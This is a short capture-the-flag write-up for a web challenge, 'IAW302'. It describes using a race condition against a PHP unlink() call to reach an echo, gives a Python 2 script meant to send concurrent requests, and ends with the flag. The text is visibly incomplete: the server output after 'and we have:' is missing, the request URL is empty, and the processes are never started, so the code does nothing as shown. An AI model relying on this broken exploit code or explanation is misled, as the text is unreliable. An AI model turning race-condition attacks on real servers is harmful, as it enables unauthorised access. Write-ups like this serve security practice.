CTF write up: IAW302

In this challenge, we will play Among Us.

Click a name and we will be redirected to the result page: /result.php?choose=CT1

Delete parameter ‘choose‘ to access ‘result.php’ and we have:

Therefore, we need to use Race Condition to pass unlink() function and run echo.

Python2 code is:

from multiprocessing import Process
import requests

def f():
  r = requests.get("")
  print r.text

if __name__ == '__main__':
  while 1:
    p = Process(target=f )
    p2 = Process(target=f )
    p3 = Process(target=f )
    p4 = Process(target=f )
    p5 = Process(target=f )


    print "-----------------------"

And we found the flag.

Flag: FUSEC{Hua_voi_moi_nguoi_lan_nay_lan_cuoi_dao_de}

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